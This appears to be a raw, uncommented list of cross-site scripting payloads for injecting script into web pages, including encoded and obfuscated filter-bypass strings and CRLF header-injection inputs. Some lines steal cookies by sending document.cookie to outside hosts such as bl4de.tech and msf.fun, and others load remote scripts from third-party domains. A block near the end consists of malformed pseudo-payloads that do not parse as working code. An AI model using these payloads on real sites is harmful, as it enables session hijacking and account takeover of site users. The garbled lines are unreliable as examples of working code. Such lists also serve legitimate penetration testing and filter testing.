&#x3C;img src=1 onerror=alert(1)&#x3E;
%2527%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520
‘ onfocus=’alert(1)’
‘ onfocus=’alert(1)’ autofocus=’
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527
‘ onmouseover=’alert(1)’
%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520
<svg%20oNinad=1%20onload=alert(document.cookie)>
?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script>
%script%alert(CXSS¢)4/script%
<DIV STYLE="background-image: url(&#1,javascript:alert('XSS))">
STYLE="xss:expr/*XSS*/ession(alert('XSS')">
<XSS STYLE="Xss:expressionfalert('XSS'))">
xss:&#101;x&#x2F; *XSS*//*//pression(alert("XSS"))'>
"<svg onload=alert (1)> " ;
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E
#<img src=1 onerror=alert(1)>
<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">
<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>
<img src="java    script:al ert('Successful XSS')">
<img src="java	script:al	ert('Successful XSS')">
<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>
<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>
<img dynsrc="javascript:alert('Successful XSS')">
<img src=`javascript:alert("The name is 'XSS'")`>
<body background="javascript:alert('Successful XSS')">
"><input autofocus onfocus =top[(584390752*16).toString(32-1*2)](/XSS/)>
'onfocus='alert(1)' autofocus='
<xml onreadystatechange=alert(1)>
&fileName=')},1000);alert("XSS`);//
fileName=')},1000);alert("XSS`);//
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)>
<bgsound onpropertychange=alert(1)>
<body onactivate=alert(1)>
<body onfocusin=alert(1)>
<div style="background-image:url(javascript:alert('Successful XSS'))">
<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script>window['alert'](document['domain'])</script>
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
";a=prompt,a()//
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
\'/alert(1)//
\'}alert(1);{//
\;alert(1)//
\\;alert(1)//
\’-alert(1)//
\’-alert(1)};{//
\’}alert(1);{//
\”;alert(1);//
‘)alert(1);//
javascript:alert(1)
<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert&#0000000040document.cookie)>
<svg onload=alert&#0000000040"1")><””>
<Img Src=//X55.is OnLoad%0C=import(Src)>
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
%3Csvg%20onload=alert(%22MrHex88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
"><svg onmouseover="confirm&#0000000040document.domain)
<Img Src=OnXSS OnError=confirm(1337)>
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
<Script>window.valueOf=alert;window%2B1</Script>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=
"><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)> 
- 1'"();<test><ScRiPt >window.alert("XSS_WAF_BYPASS")
'"><img src=x onerror=alert("xss!")>.pdf
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
"><track/onerror='confirm`1`'>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
<img/src=x onError="`${x}`;alert(`Hello`);">
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
/alert(1)}//\
<svg/onload=location=‘javas’%2B‘cript:’%2B
‘ale’%2B‘rt’%2Blocation.hash.substr(1)>#(1)
"'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
<SCRIPT>location=%27javasCript:alert\x281\x29%27</SCRIPT>
';k='e'%0Atop['al'+k+'rt'](1)//
"';k='e'%0Atop['al'+k+'rt'](1)//"
*/alert(1)/*
/alert(1)//\
<img/src/onerror=alert/1337/(1)>
<img/src/onerror=alert//&NewLine;(2)>
<img/src/onerror=alert&sol;&sol;(3)>
'"/><script%20>alert(document.domain)<%2fscript>.css
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)
login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(VulneravelXSS%26%2300000000000000000041//
"><iframe%20src="http://google.com"%%203E
"><img src=1 onerror=alert(1)>.gif
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
"><img src=x onerror=prompt(1);>
"><img src=x onerror=window.open('https://www.google.com/');>
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
"><script src=//brutelogic.com.br&sol;1.js&num;
"><script src=data:&comma;alert(1)//
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
"><svg onload=alert(1)//
"><svg/onload=alert(/XSS/)
"><svg/onload=alert(String.fromCharCode(88,83,83))>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=alert(1)/**/(import(/https:\\X55.is?1=18369/.source))//>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
<input type="image" src="javascript:alert('Successful XSS')">
%26%23x2f%3B%26%23x2f%3Br4y.pw
"/><iMg SrC="x" oNeRRor="alert(document.cookie);">
svg/onload=alert(document.cookie)abcdef@test.com
<img src="non-existent-image.jpg" onerror="alert(document.cookie);" />
[alert][0].call(this,1)
&lt;script&gt;alert(1)&lt;/script&gt;
%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
%26amp%3Blt%3Bscript%26amp%3Bgt%3Balert%281%29%26amp%3Blt%3B%2Fscript%26amp%3Bgt%3B
<details/open/ontoggle=alert()>
<details/open/ontoggle=(confirm)()//
";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)();var+test="
”al”;b=”ert”;self[a+b]();
a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(‘YWxlcnQoMSk=’))”;self[a+b](c+d+e+f)();
"><svg%20onload=alert%26%230000000040"1")>
<img/src=x onError="`${x}`;alert(`XSS`);">
-top['al\x65rt']('xss')-
<svg/on%20onload=alert(1)>
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0:2(1)',3,3,'javascript||alert'.split('|'),0,{}))
_0x68087f:alert(0x1);
/?xss=500); alert(document.cookie);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<?php echo('<SCR'); echo('IPT>alert("XSS")</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
"><img src=1 onmouseleave=print()>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="jav   ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<<SCRIPT>alert("XSS");//\<</SCRIPT>
<IMG SRC="`<javascript:alert>`('XSS')"
</script><script>alert('XSS');</script>
'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
<BODY BACKGROUND="javascript:alert('XSS')">
‘;alert(123);t=’
“;alert(123);t=”
‘>alert(154)</script><script/154=’
*/alert(155)</script><script>/*
*/alert(156)”>’onload=”/*<svg/156=’
`-alert(158)”>’onload=”`<svg/158=’
<alert(192)<! — onmouseover=location=innerHTML+outerHTML>javascript:192/*00000*/
alert(1) 
/alert`2`/i
‘-alert(79)-’
alert = a\u006cer\u0074
';alert(1);function myFunc(){}'
“])},alert(1));(function xss() {//
“alert(1)” instanceof [];
<IMG DYNSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<svg/onload=alert('XSS')>
<svg/onload=window["al"+"ert"]1337>
&quot;&gt;&lt;svg onload=alert&amp;amp;#x00000040&quot;1&quot;&gt;	
&lt;svg onload=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt;	
&lt;svg/onload=&#39;alert&amp;#40 23 &amp;#41;&#39;&gt;	
&quot;&gt;&lt;svg onload=alert&amp;#x2F;&#x00000040&quot;1&quot;&gt;	
&quot;&gt;&lt;svg onload=alert&amp;amp;#x27;&#x00000040&quot;1&quot;&gt;	
&rdquo;&gt;&lt;svg onload=alert&amp;#000000040&quot;1&quot;&gt;	
&quot;&gt;&lt;svg onload=alert&amp;#x27;&#x00000040&quot;1&quot;&gt;	
&quot;&gt;&lt;SVG ONLOAD=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(&amp;#x64&amp;#x6f&amp;#x63&amp;#x75&amp;#x6d&amp;#x65&amp;#x6e&amp;#x74&amp;#x2e&amp;#x64&amp;#x6f&amp;#x6d&amp;#x61&amp;#x69&amp;#x6e)&gt;	
PHN2ZyBvbmxvYWQ9YWxlcnQmYWxlcnQoMjMgKT4=
PHN2Zy9vbmxvYWQ9J2FsZXJ0Jz4=
%22%3E%3Csvg%20onload%3Dalert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E	
%3Csvg%20onload%3D%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%28%26%231%3B%29%3E	
%3Csvg%2Fonload%3D'alert%26%2340%2023%20%26%2341'%3E	
<BGSOUND SRC="javascript:alert('XSS');">
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<img/src/onerror="window[ al+/e/['ex + ec]'e'+'rt'](2)">
<svg/&parameter=onload=alert()>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x>
<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
>><marquee loop=1 width=0 onfinish=alert(1)>
<a href=&#01javascript:alert(1)>
<a href=javascript&colon;confirm(1)>
<a href="jav%0Dascript&colon;alert(1)">
tarun"><x/onafterscriptexecute=confirm%26lpar;)// 
%uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e
<%tag onmouseover="alert('markitzeroday.com')">
%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e
%uff3c%uff73%uff6cr%uff69%uff63%uff74%uffe0alert('XSS')%uff3e
%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003ealert('XSS')%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
1</Script><Script>1/*'/*\'/**//alert(1)//
1'"--><A HRef AutoFocus OnFocus=alert(1)//>
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uff3ealert('XSS')%uff3c%uff2f%uff73%uff63%uff72%uff69%uff70%uff74%uff3e
%uff3cscript%uff3ealert('XSS')%uff3c/script%uff3e
%3Cscript%3Ealert('XSS')%3C/script%3E
<K ContentEditable AutoFocus OnFocus=alert(1)>
“AutoFocus OnFocus=alert(1)//
%u003Cscript%u003Ealert('XSS')%u003C/script%u003E
%253Cscript%253Ealert('XSS')%253C/script%253E
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uffe0alert('XSS')%uff3e
%u0025u0073u0063u0072u0069u0070u0074u003Ealert('XSS')%u003C%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003E
&lt;script&gt;alert('XSS')&lt;/script&gt;
%25253Cscript%25253Ealert('XSS')%25253C%252Fscript%25253E
<svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
<IMG SRC=# onmouseover="alert('xxs')">
><img/onerror="javascript:alert(1%26%23x000000029;" src=x>
"><iframe/src="javascript:alert(1%26%23x00000000000000000000000000029;"></iframe>
window['alXert'.replace(/X/, '')](self['document']['cookie'])
#prettyPhoto%3Cimg%20src=x%20onerror=prompt(document.cookie)%3E;//
?&q&zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
<img/src=a onerror="window['alert'](document.cookie)"/>
<script src=//0-a.nl/conf.js></script>
<iframe src="javascript:alert('XSS')"></iframe>
<input type="text" value="javascript:alert('XSS')">
<form action="javascript:alert('XSS')">
"><script>alert(1)</script><"
javascript:/*'-alert(1)-'*/
javascript:document.body.onclick=alert(1)
123456%22/%3E%3Cmath%3E%3Carchy%20href=Ja%26Tab;vascript%26colon;console.error(1)%3EARCHY%3C/archy%3E%3C/math%3E%3C!--
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
javascript:var img=document.createElement('img');img.src='';document.body.appendChild(img);img.onerror=alert(1)
javascript:var a=document.createElement('a');a.href='javascript:alert(1)';document.body.appendChild(a)
<script>alert('\u0031')</script>
&#x3C;script&#x3E;alert(1)&#x3C;&#x2F;script&#x3E;
" onfocus="alert(1)" autofocus="
<audio src="nonexistent.mp3" onerror="alert(1)"></audio>
?query=<img/src/onerror=alert(`Xss_so`)>
?query="><img src=x onerror=prompt(document.domain);>
en-us/Search#/?search="><img src=x onerror=prompt(document.domain);>
search?q=<img/src/onerror=alert(`Xss_so`)>
Search/Results?q=<img/src/onerror=alert(`Xss_so`)>
Search/Results?q="><img src=x onerror=prompt(document.domain);>
redirect?url=javascript://%250Aalert(document.domain)
redirect.asp?url=javascript://%250Aalert(document.domain)
redirect.aspx?url=javascript://%250Aalert(document.domain)
q=javascript:alert(document.domain)
guest/msft_a_guest_register.php?_browser=1&title="><svg/onload=alert(1)>
(A("onerror='alert`1`'testabcd))/
onerror="alert('XSS')"
pods/ppt.aspx?&fileName=')}, 1000); alert('xss')://
')}, 1000); alert('xss')://
<!--xss"><img src=x onerror=prompt(document.domain)>-->
%253Cimg%2520src%253Dx%2520onerror%253Dalert%2528%2529%253E
'; x=eval; </script> <svg onpointerenter=alert()%20z= alert >
mrco24"type=image src onerror="alert(1)"
"><script akdk> prompt(document.domain)</script akdk>
foo?q=foo<script>alert('xss')<%2fscript>
Login.aspx?username=<img/src/onerror=alert(Xss_so)>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<img src="javascript:alert('XSS')" alt="Image">
<Img Src=OnXSS OnError=confirm(document.cookie)>
xxxxxxxxx'});});</script><script>prompt("PLEASE%20\nSUBSCRIBE")</script>
xxxxxxxxx'});}); </script><script>prompt ("PLEASE%20\nSUBSCRIBE") </script>
<img src=x onerror=print()>
javascript://'/</title></style></textarea></script>--><p"onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')
#jaVasCript:/*-/*/*\/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
`javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>/alert()/
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'
#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/*/*/**/**/**/*%0D%0A%0d%0a*//**/oNclick-alert())//</style/</title/</textarEa/</script/->\x3ciframe/<iframe/oNloAd-alert(1)//>\x3e
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')<img src=x onerror='(function s(){var i=new Image();i.src='http://bl4de.tech/bxss.php?c='+document.cookie+';'+encodeURIComponent(location.href);document.body.append(i)})()'/>#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
"onmouseover="alert(1)
"onmouseover=alert(1)
嘍嘊Set-Cookie:whoami=thecyberneh嘍嘊嘍嘊嘍嘊嘼script嘾alert(1);嘼/script嘾
嘍嘊Set-Cookie: whoami=thecyberneh%u2028%u2029XSS-Payload:%20<script>alert(1)</script>
%0D%0A%0D%0A%3Cscript%3E%0D%0A%20alert(1);%0D%0A%3C/script%3E%0D%0A
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE%0D%0A%0D%0A<script>%0D%0Aalert(1);%0D%0A</script>
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
<a"/onclick=(confirm)()>elcezeri!
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
<svg onload=alert(document.domain)>
xss"><!--><svg/onload=alert(document.domain)>
"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
%3Cimg src='null' onerror=alert('spyerror')%3E
<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
<object/data="javascript&colon;alert/**/(document.domain)">//
<iframe src="javasc%0a%0dript:alert(0);">
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%22XSS%22)%3E
&quot;&gt;&lt;img src=x onerror=prompt(&quot;XSS&quot;)&gt;
"\">" + "<img src=x onerror=prompt('XSS')>" + "\""
"><img&#x20;src=x&#x20;onerror=prompt('XSS')>"
"><body/onload="{x:onerror=alert};x"
%3csvg/onload=window%5b%22al%22+%22ert%22%5d1337`%3e
"><img src=x onerrora=confirm() onerror=confirm(1)>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
#"onmouseover="alert(1)
#javascript:alert(1)
"'><img src=q onerror=alert(1)>
<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
'-setTimeout`prompt\u0028document.domain\u0029`-'
}}}</script><script>alert(1)</script>
alert?.(document?.cookie)
<--`<img/src=`%20onerror=confirm``>%20--!>
{{&lt;svg/onload=prompt(&quot;XSS&quot;)&gt; }}
javascript:alert(1)?q=%26callback%3Durc_button.click%23
#&quot;-alert(1)}//
test+(<script>alert(0)</script>)@gmail.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
#&#39;-alert(1)-&#39;
&#39;-alert(1)-&#39;
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>'
<details open id="' &quot;'"ontoggle=alert(1)>
%22-alert('XSS')-%22
#&lt;img&#47;src&#47;onerror=alert(`Xss_so`)&gt;
#&lt;script&gt;prompt(document.domain)&lt;&#47;script&gt;
JavaScript://%250Dtop.confirm?.(1)//
1'"><!--><Base Href=//X55.is?
1'-top['con\146irm'](1)-'
/confirm(1)?.(1)//\
/confirm?.(1)//\
input.onfocus=alert(1)
';alert`1`//
alert(document.domain)
input.onfocus=function(){alert(1)}
input[0].onfocus=alert(1)
input.onfocus=alert'XSS'
document.domain;alert(1)
alert(documentdomain)
alert(1)alert(2)
print(alert(1))
alert('XSS')alert(2)
alert=documentdomain
input&onfocus='alert'1
alert'XSS'&print+input
alert=1&input=focus
alert'XSS'+print#1
input(onfocus)alert(1)
input[0].onfocus(alert(1))
input/on-focus(alert(1))
alert(document.domain)?input()
input[0].onfocus=alert(1);
input{onfocus}=alert(1)/
(alert(document.domain));
input.focus()/alert(1)
input[onfocus]=function(){alert('XSS')}
print(alert(document.domain))
input/onfocus=alert(1);
alert(document.domain)#print
alert'XSS'>input.focus()
{alert(document.domain)}&input()
input?onfocus=alert(1)
input[0](onfocus(alert(1)));
alert(document.domain)?"XSS"
[alert(1)];input()
input{onfocus}(alert(1))
alert[1](document.domain)?
input+onfocus(alert(1))
alert(document.domain)/print
input.onfocus{alert('XSS')}
alert(1)&document.domain
'input'[onfocus]=alert(1);
print(alert'XSS')
(input().onfocus)=alert(document.domain)
document.domain?print(alert(1))
input[alert]#(document.domain)
alert(document.domain)/input
input(onfocus)="alert(1)"
input{alert}(document.domain)
input.focus;alert[1]
input<alert(1)>print()
input(onfocus)[alert(document.domain)]
alert(input.focus)=1
[alert](document.domain)
document.domain;alert'XSS'
input(alert)=(document.domain)
{alert(document.domain)}/print
input().onfocus='alert(1)'
alert(1)?input=document.domain
input.alert(document.domain)
print[alert](document.domain);
<img src=x onerror='alert(1)'>
<input type="text" onfocus="alert('XSS')">
{alert:(1)}
</title><img src=x onerror=alert(1)>
document['domain'].alert(1)
'"><img src=x onerror="alert(1)">
a.href=javascript:alert(1)
img.src=x;img.onerror=alert(1)
input[0](onfocus=alert(1))
obj={alert:1};obj.alert=1
document[domain]=function(){alert(1)}
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
<svg onload=eval`alert(1)`></svg>
<input autofocus onfocus=&#x61;&#x6C;&#x65;&#x72;&#x74;(1)>
input[0].onfocus=function(){alert(1)}
#"><img src=x onerror=prompt(document.domain);>
1')"<!--><Svg OnLoad=(confirm)(1)<!--
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=
<script>prompt(document.domain)</script>
#<script>prompt(document.domain)</script>
-->""/></script><deTailS open x=">" ontoggle=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
<script>onerror=alert;throw 1337</script>
")%27--><sVG/onLoad=(confirm)(1)--!>"
")%27--><SvG/onLoad=(conf&#105;rm)(1)--!>"
")%27--><SvG/onLoaD=(co&#110;firm)(1)<!--"
")%27--><sVG/onload=(conf&#105;rm)(1)<!--"
")%27--><sVG/onload=(conf&#105;rm)(1)--!>"
